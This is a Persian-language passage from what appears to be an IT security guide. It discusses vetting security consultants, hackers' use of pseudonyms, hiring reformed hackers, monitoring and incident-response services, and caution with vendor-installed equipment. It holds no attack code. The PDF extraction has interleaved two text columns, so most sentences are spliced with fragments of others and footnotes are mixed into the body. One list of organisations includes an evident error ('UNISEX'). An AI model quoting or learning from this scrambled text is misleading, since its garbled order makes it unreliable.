‫ﺑﺎﺷﻨﺪ! ﺍﻣﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺘﺪﺍﺋﻲﺗـﺮﻳﻦ ﺩﻻﻳﻠـﻲ ﻛـﻪ ﻣـﻲﺗـﻮﺍﻥ‬ ‫ﺑـــﻴﻦﺍﻟﻤﻠﻠـــﻲ )‪ ،IEEE ،CSI ،ASIS ،ACM‬ﻭ ‪ (UNISEX‬ﻋـــﻀﻮ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﺳﺎﻣﻲ ﻣﺴﺘﻌﺎﺭ ﺑﺮﺷﻤﺮﺩ ﺍﻳﻦ ﺍﺳـﺖ‬ ‫ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﺍﺭﺗﺒﺎﻁ ﻣﻄﻠﻮﺑﻲ ﺑﺎ ﺁﻧﻬﺎ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﻳﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻛﻪ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﻗﺒﺎﻝ ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺑﺮ ﻋﻬﺪﻩ‬ ‫ﺑﺮﺍﻱ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﻣﻄﺎﻟـﺐ ﺁﻣﻮﺯﺷـﻲ ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﭘﻴـﺸﺮﻓﺖ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﻳـﻚ ﻧـﺎﻡ ﻣـﺴﺘﻌﺎﺭ ﺑـﺪﻧﺎﻡ ﺷـﺪ ﺑـﺴﻴﺎﺭ‬ ‫ﺗﺨﺼﺼﻲ ﻣﻬﻴﺎ ﻣﻲﺳﺎﺯﻧﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺭﻓﺘـﺎﺭ‬
‫ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻋﻮﺽ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﺑﺨﻮﺍﻫـﺪ‬ ‫ﺣﺮﻓﻪﺍﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺳﻮﮊﺓ ﺷﻤﺎ ﺗﻨﻬﺎ ﻣـﺪﻋﻲ‬
‫ﻧﺎﻡ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻭ ﻳـﺎ ﺳـﺎﺑﻘﺔ ﺁﻧـﺮﺍ ﺍﺻـﻼﺡ‬ ‫ﺳﺎﺑﻘﺔ ﻋـﻀﻮﻳﺖ ﺩﺭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻣﺜـﻞ " ‪The 133t Hax0r‬‬
‫ﻛﻨﺪ‪.‬‬ ‫‪ "Guild‬ﺍﺳﺖ ﺷﺎﻳﺪ ﺑﻬﺘـﺮ ﺑﺎﺷـﺪ ﺟـﺎﻱ ﺩﻳﮕـﺮﻱ ﺑـﺪﻧﺒﺎﻝ ﻳـﻚ‬
‫ﻛﺎﺭﺷﻨﺎﺱ ﺍﻣﻨﻴﺖ ﺑﮕﺮﺩﻳﺪ!‬

‫‪ ۱۱۴‬ﺁﻣﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻛﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺍﺻـﻼﺡ‪-‬‬


‫ﺷﺪﻩ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩﻧﺪ ﺩﺭ "ﺗﺤﻘﻴﻖ ﺟﺮﻡ ﻭ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ" ﺳـﺎﻝ‬
‫‪ CSI/FBI ۲۰۰۳‬ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/FBI‬‬ ‫‪112 Purdue University‬‬
‫‪2003.pdf‬‬ ‫‪113 The University of California at Davis‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٧٢‬‬

‫ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪.‬‬ ‫ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﻣـﺮﻭﺯﻱ ﭼﻨـﺪﺍﻥ‬ ‫‪.۳‬‬
‫ﻫﻢ ﺑﻪ ﻣﺒﺎﺣﺚ ﺍﻣﻨﻴﺘﻲ ﻭﺍﺭﺩ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻫـﻢ ﺩﺭ ﺭﻭﺵ ﻭ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺯ ﻛﺴﻲ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺁﻥ‬ ‫‪.۲‬‬
‫ﺟﺰﺀ ﺑﺮ ﻋﻬﺪﺓ ﺍﻭ ﺍﺳﺖ ﮔﺰﺍﺭﺵ ﻛﺘﺒﻲ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪ .‬ﺍﮔـﺮ‬ ‫ﻫﻢ ﺩﺭ ﺷﻴﻮﺓ ﻛﺎﺭ ﺑﻴﺸﺘﺮ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺟﻨـﺎﻳﻲ ﻋﻤـﻞ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻧـﺼﺐ ﺷـﺪﻩ‬ ‫ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﺮﻧﺎﻣـﻪ ﻧﻮﻳـﺴﺎﻥ ﻭ ﻣﻌﻤـﺎﺭﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ‪ .‬ﺍﻳـﻦ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺩﻧﻴﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﻔﺮﺳـﺘﺪ ﻳـﺎ‬ ‫ﻛﻴﻔﻴﺖ ﭘﺎﺋﻴﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺍﻣـﺮﻭﺯﻱ‪ ،‬ﻓﻘـﺪﺍﻥ ﺭﻭﻧـﺪ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻳﻬﺎ‪ ،‬ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﮔـﺴﺘﺮﺩﺓ‬
‫ﺩﺭ ﭘﺮﻛــﺎﺭﺑﺮﺩﺗﺮﻳﻦ ﺳــﺎﻋﺎﺕ ﺭﻭﺯ ﺑــﺼﻮﺭﺕ ﻏﻴﺮﻣﻨﺘﻈــﺮﻩ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺧﻮﺩﻛﺎﺭ ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﺷﺪﻩ ﺩﺳﺖﻳـﺎﺯﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ‪ ،‬ﻧﺒﺎﻳﺪ ﻧﺎﮔﻬﺎﻥ ﻣﺘﻮﺟـﻪ‬
‫ﻭ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﺎﺩﮔﻲ ﻣﻴـﺴﺮ ﺑﺎﺷـﺪ‪.‬‬
‫ﺷﻮﻳﺪ ﻃﺒﻖ ﺗﻮﺍﻓﻘﻲ ﻛـﻪ ﺑـﺎ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺍﺷـﺘﻪﺍﻳـﺪ ﻫـﻴﭻ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺎ ﺳﺎﺑﻘﺔ ﭘﺮﺵ ﺑﺎ ﺍﺗﻮﻣﺒﻴﻞ ﻟﺰﻭﻣﹰﺎ ﻳﻚ‬
‫ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟﻪ ﺍﻭ ﻧﻴﺴﺖ!‬
‫ﺭﺍﻧﻨﺪﺓ ﻣﺎﻫﺮ ﻣﺎﺷﻴﻦ ﻣﺴﺎﺑﻘﻪ ﻳﺎ ﻳﻚ ﻃـﺮﺍﺡ ﺧﺒـﺮﺓ ﻣﻮﺗـﻮﺭ‬
‫ﺧﺎﻃﺮﺟﻤﻊ ﺷﻮﻳﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﻪ‪ ،‬ﺁﺯﻣـﺎﻳﺶ ﻭ ﺍﺳـﺘﻘﺮﺍﺭ ﺁﻥ‬ ‫‪.۳‬‬ ‫ﺍﺗﻮﻣﺒﻴﻞ ﻧﻴﺴﺖ‪ ،‬ﻛﺴﻲ ﻛﻪ ﻣﻲ ﺩﺍﻧﺪ ﭼﮕﻮﻧـﻪ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ‬
‫ﻓﻨﺎﻭﺭﻱ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺍﻓﺰﻭﺩﻩ ﻣﻲﺷﻮﺩ ﻣﺮﺍﻗﺒﺖ‬ ‫ﻧﻔﻮﺫ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺭﺍ‬
‫ﺩﻗﻴﻖ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ؛ ﺑﻮﻳﮋﻩ ﺍﮔﺮ ﻃﺮﺍﺣﻲ ﻣﻨﺤـﺼﺮ ﺑـﻪ‬ ‫ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻓﻬﻢ ﺧﻮﺩ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ‬
‫ﻓﺮﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻄﻮﺭ ﺧـﺎﺹ‪ ،‬ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺳـﻮﺍﺑﻖ‬ ‫ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﻣـﺸﻜﻼﺕ‬
‫ﻛﻴﻔــﻲ ﻭ ﻣــﺴﺎﺋﻞ ﺍﻣﻨﻴﺘــﻲ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺷــﺮﻛﺖ‬ ‫ﺑﻨﻴﺎﺩﻳﻦ ﺑﺎﺷﺪ‪.‬‬
‫ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ‪ ،‬ﭘﻴــﺸﻨﻬﺎﺩ ﻣــﻲﻛﻨــﻴﻢ ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺧﺪﻣﺎﺕ ﻫﺮ ﺷﺮﻛﺘﻲ ﻛﻪ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪ ﻓﻨـﺎﻭﺭﻱ ﺍﻣﻨﻴـﺖ‬ ‫ﺧﺪﻣﺎﺕ ﻧﻈﺎﺭﺕ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻣﺒﻨﺎﻱ ﻣﺤﺼﻮﻻﺕ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻗـﺮﺍﺭ ﺩﻫـﺪ‬
‫ﺍﮔﺮ ﻭﺿﻌﻴﺖ ﻋﻤﻮﻣﻲ ﭘﺎﻳﺪﺍﺭ ﺑﺎﺷﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻧﻈـﺎﺭﺕ ﻭ‬
‫ﺩﻗــﺖ ﻻﺯﻡ ﺭﺍ ﺑﻌﻤــﻞ ﺁﻭﺭﻳــﺪ؛ ﭼﺮﺍﻛــﻪ ﺁﻥ ﺷــﺮﻛﺖ ﺑﺎﻳــﺪ‬
‫ﻛﻨﺘﺮﻝ ﺳﺮﻣﺎﻳﻪ ﮔﺬﺍﺭﻱ ﺧﻮﺑﻲ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ‪ .‬ﺧﺪﻣﺎﺕ ﺭﺍﻳﺠﻲ‬
‫ﻫﻤﻮﺍﺭﻩ ﻣﻌﺎﻳﺐ ﻳﺎﻓﺖﺷﺪﺓ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﺤﺼﻮﻻﺕ‬
‫ﻛﻪ ﺑﺼﻮﺭﺕ ﺭﻭﺯﻣﺮﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺭﺍﻫﺒﺮﻱ ﻣﺤﻞ ﻛﺎﺭ‬
‫ﺞ ﺧــﻮﺩ ﺭﻓــﻊ ﻛﻨــﺪ ﻭ ﺩﺭ ﻋــﻴﻦ ﺣــﺎﻝ ﺳــﺎﺯﮔﺎﺭﻱ ﺁﻥ‬‫ﺭﺍﻳـ ﹺ‬
‫ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ‪ ،‬ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﻣﻨﻴﺖ ﻣﺤﻞ ﻛﺎﺭ ﻭ ﺧﺎﺭﺝ ﺍﺯ ﺁﻥ‪ ،‬ﻭﺍﻛـﻨﺶ‬
‫ﻣﺤﺼﻮﻻﺕ ﺑﺎ ﻧﺴﺨﻪﻫﺎﻱ ﻗﺒﻠﻲ ﺭﺍ ﻧﻴﺰ ﺣﻔﻆ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﻪ ﺭﺧﺪﺍﺩ ﻭ ﭘﻴﮕﺮﺩ ﻗـﺎﻧﻮﻧﻲ )ﺩﺭﺻـﻮﺭﺕ ﺩﺭﺧﻮﺍﺳـﺖ( ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ‬
‫ﺍﻳﻨﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮ ﻭﺍﻗﻌﹰﺎ ﺑـﻪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬ ‫‪.۴‬‬ ‫ﻳﻚ ﺳﺎﻳﺖ ﺟﺎﻳﮕﺰﻳﻦ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻭﻗـﺖ ﺧﺮﺍﺑـﻲ ﺳـﺎﻳﺖ‬
‫ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻳﺎ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﻣﺸﻜﻞ ﭘﻲ‬ ‫ﺍﺻﻠﻲ‪ .‬ﺍﻣﺎ ﻋﻼﻭﻩ ﺑﺮ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﺧﺼﻮﺹ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺧـﺪﻣﺎﺕ‬
‫ﺑﻪ ﻭﺟﻮﺩ ﺁﻥ ﻣﻲﺑﺮﺩ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬ ‫ﻣــﺸﺎﻭﺭﻩﺍﻱ ﺍﺭﺍﺋــﻪ ﻣــﻲﺩﻫﻨــﺪ ﺑﺎﻳــﺪ ﻣﺮﺍﻗــﺐ ﺳــﺨﺖﺍﻓﺰﺍﺭﻫــﺎ ﻭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺁﻧﻬﺎ ﻫﻢ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻛﻼﻡ ﺁﺧﺮ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻧﻈـﺎﺭﺗﻲ ﻭ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ‪،‬‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺑﻴﺮﻭﻧــﻲ ﺭﺍﻩ ﺧــﻮﺑﻲ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ‬ ‫ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺭﻭﻱ ﺷـﺒﻜﺔ‬
‫ﺣﻔﺎﻇﺘﻬــﺎﻱ ﻻﺯﻡ ﻣــﻲﺑﺎﺷــﺪ‪ .‬ﻣﻬﺎﺭﺗﻬــﺎﻳﻲ ﻛــﻪ ﺑــﺮﺍﻱ ﺗــﺪﻭﻳﻦ‬ ‫ﺷﻤﺎ ﻧﺼﺐ ﻛﻨﻨﺪ‪ .‬ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻻﺯﻡ‬
‫ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﻧﻈﺎﺭﺕ ﺑﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬ ‫ﺟﻬــﺖ ﺑــﺎﺯﺑﻴﻨﻲ ﻭ ﺗﻐﻴﻴــﺮ ﺗﻨﻈﻴﻤــﺎﺕ ﺍﻣﻨﻴﺘــﻲ ﺳﻴــﺴﺘﻢ ﺍﺳــﺘﻔﺎﺩﻩ‬
‫ﺁﺗﺶ‪ ،‬ﻭ ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﺔ ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ ﻻﺯﻡ ﺍﺳﺖ‬ ‫ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﺎﻳﺪ ﺑﺎ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺧﻮﺭﺩ ﻣﺤﺘﺎﻃﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ؛‬
‫ﺑﻌﻀﹰﺎ ﺑﺴﻴﺎﺭ ﺗﺨﺼﺼﻲ ﻭ ﻧﺎﻣﺘﻌﺎﺭﻑ ﻫـﺴﺘﻨﺪ ﻭ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬ ‫ﭼﺮﺍﻛﻪ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻲ ﻣﺠﺎﺯ ﻭ ﺩﺭﻭﻥ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‬
‫ﻣﻴﺎﻥ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻓﻌﻠـﻲ ﺳـﺎﺯﻣﺎﻥ ﻭﺟـﻮﺩ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﻧﺠـﺎﻡ‬ ‫ﺍﺳﺖ‪:‬‬
‫ﺻﺤﻴﺢ ﻫﻤﻴﻦ ﻛﺎﺭﻫﺎﺳﺖ ﻛﻪ ﺩﺭ ﺗﺪﺍﻭﻡ ﻳﻚ ﺗﺠـﺎﺭﺕ ﻳـﺎ ﺧﺎﺗﻤـﺔ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺍﺟـﺰﺍﻱ ﻣﺨﺘﻠـﻒ ﺷـﺒﻜﻪ ﻭ‬ ‫‪.۱‬‬
‫ﺁﻥ ﺑﻪ ﻋﻠﺖ ﺑﺮﻭﺯ ﻋﻴﺐ ﻭ ﻧﻘﺼﻬﺎﻱ ﻣﺨﺘﻠﻒ‪ ،‬ﺗﻌﻴﻴﻦﻛﻨﻨﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﺠﻬﻴــﺰﺍﺕ ﺁﻥ ﺗﻮﺿــﻴﺤﺎﺕ ﻛﺎﻣــﻞ ﻭ ﻛﺘﺒــﻲ ﺩﺭﻳﺎﻓــﺖ‬
‫ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺣﻮﺯﺓ ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺖ ﺑﺎ ﺧﻄﺮ ﺭﻭﺑﺮﻭ ﺍﺳﺖ؛ ﭼﺮﺍﻛـﻪ‬ ‫ﻣﻲﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﻣﺘﻮﺟـﻪ‬
‫ﭘﺪﻳﺪﻩﺍﻱ ﺟﺪﻳﺪ ﺍﺳﺖ ﻭ ﺑﺨﻮﺑﻲ ﺩﺭﻙ ﻧﻤﻲ ﺷﻮﺩ‪ .‬ﺍﻓﺮﺍﺩ ﺷﺎﺭﻻﺗﺎﻥ‪،‬‬ ‫ﻣﻲﺷﻮﻳﺪ ﺁﻥ ﺍﺟﺰﺍ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻫﺮﻳـﻚ ﭼـﻪ‬
‫‪١٧٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺣﻘﻪﺑﺎﺯ‪ ،‬ﺑﻲﺗﺠﺮﺑﻪ ﻭ ﺗﺎﺯﻩﻛﺎﺭ ﻫﻤﻴﺸﻪ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ‬


‫ﻣﻮﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺍﻓﺮﺍﺩ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻭ ﺣﺮﻓـﻪﺍﻱ ﻛـﻪ ﺩﺭ‬
‫ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻛـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﺗﻤﻴـﺰ ﺩﺍﺩ‪ .‬ﺍﻟﺒﺘـﻪ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ ﺑـﻪ‬
‫ﺗﺸﺨﻴﺺ ﻣﺴﺎﺋﻞ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﻧﺘﺨـﺎﺏ ﺻـﺤﻴﺢ ﺩﺭ ﮔـﺎﻡ‬
‫ﺍﻭﻝ ﺑﻪ ﻣﻘﺪﺍﺭﻱ ﺗﻼﺵ ﻭ ﺳﺮﻣﺎﻳﻪ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪.‬‬
‫ﻳﻚ ﺭﺍﻩ ﻛﻪ ﺑﺮﺍﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺷﻤﺎ ﺍﺯ ﺭﺷﺪ ﺍﻳﻦ ﺣﻮﺯﻩ ﭘﻴـﺸﻨﻬﺎﺩ‬
‫ﻣﻲﺷﻮﺩ ﺩﻭﺭﻱ ﺟـﺴﺘﻦ ﺍﺯ ﺍﻧﻌﻘـﺎﺩ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻱ ﻃـﻮﻻﻧﻲ ﻣـﺪﺕ‬
‫ﺍﺳﺖ؛ ﻣﮕﺮ ﺁﻧﻜﻪ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑـﺴﻴﺎﺭ ﻣـﻮﺭﺩ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ ﻭ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺩ ﺭﺍ ﺑـﻪﺭﻭﺯ ﻧﮕـﻪ ﺩﺍﺭﺩ‪ .‬ﭼـﺸﻢﺍﻧـﺪﺍﺯ‬
‫ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺖ ﺩﺭ ﭼﻨﺪ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻣﺴﺘﻌﺪ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺎﺩ ﺍﺳﺖ‪ ،‬ﻭ‬
‫ﺍﮔﺮ ﺩﺭ ﻫﺮ ﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﻴﺪ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻛـﻪ ﻫﻤـﺮﺍﻩ ﺑـﺎ ﺁﻥ‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴـﺪ ﻣﻨـﺎﻓﻊ ﺧﻮﺩﺗـﺎﻥ ﺑﻬﺘـﺮ‬
‫ﺗﺄﻣﻴﻦ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺳﺮﺍﻧﺠﺎﻡ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺑـﺮﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﺧـﺪﻣﺎﺗﻲ ﻗـﺮﺍﺭﺩﺍﺩ‬


‫ﺑﺴﺘﻪﺍﻳﺪ ﻛﻪ ﺩﺭ ﻗﺒﺎﻝ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﺘﺎﻥ ﺑﺮ ﺁﻧﻬـﺎ‬
‫ﻧﻈﺎﺭﺕ ﻛﻨﺪ‪ ،‬ﺍﻣـﺎ ﻫﻮﺷـﻴﺎﺭﻱ ﻭ ﻣﺮﺍﻗﺒـﺖ ﺧـﻮﺩ ﺭﺍ ﻧﻴـﺰ ﺍﺯ ﺩﺳـﺖ‬
‫ﻧﺪﻫﻴﺪ‪ :‬ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺍﻗـﺐ ﺑﺎﺷـﻴﺪ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
